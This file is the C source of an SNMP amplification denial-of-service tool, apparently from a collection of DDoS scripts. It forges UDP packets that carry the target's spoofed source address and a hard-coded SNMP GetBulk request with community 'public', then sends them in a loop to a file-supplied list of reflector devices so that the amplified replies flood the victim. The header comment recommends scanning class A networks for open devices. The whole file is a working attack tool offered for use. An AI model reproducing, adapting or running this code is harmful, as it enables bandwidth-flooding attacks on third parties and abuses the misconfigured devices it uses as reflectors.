Path: blob/master/DDOS Scripts/AMP Methods/NTP - SNMP - HAVEN - DNS -DRDOS - FRAG - SUDP - MEMCACHED/snmp-c.c
4622 views
/*12SNMP DoS v1.032.14.20054[email protected]56Sends a spoofed SNMP BulkGet .1.3.6.1 request to list of devices in file with community string public7equiv. command line is `snmpbulkget -v2c <device> public internet`8well, the target will get the first large packet, not the results of GetNext9generally it greatly amplifies the bandwidth10ADMsnmp can be easiy used with some shell scripting to scan class As for devices set to 'public'1112Code modified from snmpkill.c and some taken from papasmurf.c13thanks kundera and tfreak1415*/1617#include <stdio.h>18#include <string.h>19#include <unistd.h>20#include <stdlib.h>21#include <netinet/in_systm.h>2223#include <sys/types.h>24#include <sys/socket.h>25#include <netinet/in.h>26#include <arpa/inet.h>27#include <netinet/ip.h>28#include <netinet/udp.h>29303132#include <sys/types.h>33#include <sys/socket.h>34#include <netinet/in.h>35#include <arpa/inet.h>363738struct sockaddr_in dest;3940int sok,i=0, count=0, loop=0, lcount=0;4142char *source, *filename;43char c;4445FILE *hostfile;46char buf[32];47u_long address[2048];48int num = 0, n;4950char snmpkill[] =51"\x30\x24\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x17\x02"52"\x04\x7b\x73\xcc\x13\x02\x01\x00\x02\x01\x64\x30\x09\x30\x07\x06"53"\x03\x2b\x06\x01\x05";5455565758in_cksum (unsigned short *ptr, int nbytes)59{6061register long sum; /* assumes long == 32 bits */62u_short oddbyte;63register u_short answer; /* assumes u_short == 16 bits */6465/*66* Our algorithm is simple, using a 32-bit accumulator (sum),67* we add sequential 16-bit words to it, and at the end, fold back68* all the carry bits from the top 16 bits into the lower 16 bits.69*/7071sum = 0;72while (nbytes > 1)73{74sum += *ptr++;75nbytes -= 2;76}7778/* mop up an odd byte, if necessary */79if (nbytes == 1)80{81oddbyte = 0; /* make sure top half is zero */82*((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */83sum += oddbyte;84}8586/*87* Add back carry outs from top 16 bits to low 16 bits.88*/8990sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */91sum += (sum >> 16); /* add carry */92answer = ~sum; /* ones-complement, then truncate to 16 bits */93return (answer);94}959697void usage (void)98{99printf("SNMP DoS v1.0\n");100printf("Usage: snmpdos [-t target ip_addr] [-f host file] [-l loop count] \n");101}102103104105106107void loadfile (void)108{109if ((hostfile = fopen(filename, "r")) == NULL)110{111perror("Opening hostfile");112exit(-1);113}114115while (fgets(buf, sizeof buf, hostfile) != NULL)116{117char *p;118int valid;119120/* skip over comments/blank lines */121if (buf[0] == '#' || buf[0] == '\n') continue;122123/* get rid of newline */124buf[strlen(buf) - 1] = '\0';125126/* check for valid address */127for (p = buf, valid = 1; *p != '\0'; p++)128{129if ( ! isdigit(*p) && *p != '.' )130{131fprintf(stderr, "Skipping invalid ip %s\n", buf);132valid = 0;133break;134}135}136137/* if valid address, copy to our array */138if (valid)139{140address[num] = inet_addr(buf);141num++;142if (num == 2048)143break;144}145}146147}148149150151152int sendit(ulong destaddr)153{154155struct pseudoudp {156u_long ipsource;157u_long ipdest;158char zero;159char proto;160u_short length;161} *psudp;162163struct in_addr sourceip_addr;164struct in_addr destip_addr;165struct ip *IP;166struct udphdr *UDP;167char *packet, *packetck, *data;168int datasize;169170171destip_addr.s_addr=destaddr;172sourceip_addr.s_addr=inet_addr(source);173dest.sin_addr.s_addr=destip_addr.s_addr;174175datasize=sizeof(snmpkill);176177packet = ( char * )malloc( 20 + 8 + datasize );178179IP = (struct ip *)packet;180181memset(packet,0,sizeof(packet));182183IP->ip_dst.s_addr = destip_addr.s_addr;184IP->ip_src.s_addr = sourceip_addr.s_addr;185IP->ip_v = 4;186IP->ip_hl = 5;187IP->ip_ttl = 245;188IP->ip_id = htons(1047);189IP->ip_p = 17;190IP->ip_len = htons(20 + 8 + datasize);191IP->ip_sum = in_cksum((u_short *)packet,20);192193194UDP = (struct udphdr *)(packet+20);195UDP->source = htons(161);196UDP->dest = htons(161);197UDP->len = htons(8+datasize);198UDP->check = 0;199packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));200bzero(packetck,8 + datasize + sizeof(struct pseudoudp));201psudp = (struct pseudoudp *) (packetck);202psudp->ipdest = destip_addr.s_addr;203psudp->ipsource = sourceip_addr.s_addr;204psudp->zero = 0;205psudp->proto = 17;206psudp->length = htons(8+datasize);207memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);208memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);209210UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));211212data = (unsigned char *)(packet+20+8);213memcpy(data,snmpkill,datasize);214215216return(sendto(sok,packet,20+8+datasize,0,(struct sockaddr *) &dest,sizeof(struct sockaddr)));217218free(packet);219free(packetck);220}221222223224int main(int argc,char **argv){225226if(argc < 3) {227usage();228return 0;229}230231while((c=getopt(argc,argv,"t:f:l:"))!=EOF){232switch(c) {233case 't': source=optarg; break;234case 'f': filename=optarg; break;235case 'l': loop=atoi(optarg); break;236default: usage();237}238}239240loadfile();241242243dest.sin_family=AF_INET;244245if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)246{247printf("Can't create socket.\n");248exit(EXIT_FAILURE);249}250251n=0;252253254while(lcount < loop){255256while(n < num)257{258if(sendit(address[n]) == -1) printf ("SENDING ERROR!\n");259n++;260count++;261}262263if(n == num){ n = 0; lcount++;}264265}266267268269270printf("%i packets sent\n", count);271272return 0;273}274275276